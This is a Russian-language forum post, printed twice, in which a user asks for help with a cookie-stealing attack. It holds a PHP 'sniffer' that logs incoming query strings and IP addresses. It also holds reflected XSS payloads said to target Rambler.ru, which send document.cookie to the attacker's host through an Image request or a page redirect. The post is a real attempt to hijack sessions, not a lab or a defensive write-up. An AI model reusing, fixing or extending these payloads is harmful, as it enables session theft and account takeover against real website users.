Umnick
22.11.2009, 00:42
Доброго времени суток. Прошу помочь советом? Я использую браузер Mozilla Firefox. Так вот проблема в том что я не могу отправить куки на сниффер. Начну попорядку.
1. У меня есть свой хост с поддержкой PHP но без поддержки .htaccess. Это: http://www.wallst.ru. На него я залил свой скрипт. Вот исходный код:
<?php
$log="log.txt";
$file=fopen($log,"a+");
$RZ="_";
$Date=date("d:m:Y");
$Time=date("H:i");
$IP=$_SERVER['REMOTE_ADDR'];
$QS=$_SERVER['QUERY_STRING'];
fputs($file,$Date.$RZ.$Time.$RZ.$IP.$RZ.$QS."\n");
fclose($file);
?>
Скрипт в формате php так как htaccess не поддерживается. Права на файл сниффера и на текстовый файл log.txt я выставил 777.
2. Захотел проверить работу сниффера... Нашел пассивную XSS уязвимость в Рамблер.ру. Пишу запрос в строку браузера на вывод моих cookies через функцию alert().
http://........./.........?="><script>alert(document .cookie)</script>. Выводятся мои плюшки...:). Все нормульки. Но если написать запрос на отправку кук на мой сниффер, то на него абсолютно ничего не приходит, запрос пишу вод так:
http://........./.........?=<script>img = new Image(); img.src ="http://sniffer.ru/sniffer.php?"+document.cookie;</script>
Тоесть я предпологаю что все что находится после "?"
будет отправлено в QUERY_STRING(так должно быть).
Пробывал и так:
http://........./.........?=<script>document.location.replace('http:sniffer.ru
sniffer.php?'+document.cookie);</script>, тоже ничего.
Огромная просьба исравить что не так. Может код сниффера, может запрос, я не могу понять, уже всю голову изломал. Удалил нафиг фаервол, антивирь, все что связано с защитой, пробовал реалезовать в Опере тоже самое. Прозьба дать дельный совет...
1. У меня есть свой хост с поддержкой PHP но без поддержки .htaccess. Это: http://www.wallst.ru. На него я залил свой скрипт. Вот исходный код:
<?php
$log="log.txt";
$file=fopen($log,"a+");
$RZ="_";
$Date=date("d:m:Y");
$Time=date("H:i");
$IP=$_SERVER['REMOTE_ADDR'];
$QS=$_SERVER['QUERY_STRING'];
fputs($file,$Date.$RZ.$Time.$RZ.$IP.$RZ.$QS."\n");
fclose($file);
?>
Скрипт в формате php так как htaccess не поддерживается. Права на файл сниффера и на текстовый файл log.txt я выставил 777.
2. Захотел проверить работу сниффера... Нашел пассивную XSS уязвимость в Рамблер.ру. Пишу запрос в строку браузера на вывод моих cookies через функцию alert().
http://........./.........?="><script>alert(document .cookie)</script>. Выводятся мои плюшки...:). Все нормульки. Но если написать запрос на отправку кук на мой сниффер, то на него абсолютно ничего не приходит, запрос пишу вод так:
http://........./.........?=<script>img = new Image(); img.src ="http://sniffer.ru/sniffer.php?"+document.cookie;</script>
Тоесть я предпологаю что все что находится после "?"
будет отправлено в QUERY_STRING(так должно быть).
Пробывал и так:
http://........./.........?=<script>document.location.replace('http:sniffer.ru
sniffer.php?'+document.cookie);</script>, тоже ничего.
Огромная просьба исравить что не так. Может код сниффера, может запрос, я не могу понять, уже всю голову изломал. Удалил нафиг фаервол, антивирь, все что связано с защитой, пробовал реалезовать в Опере тоже самое. Прозьба дать дельный совет...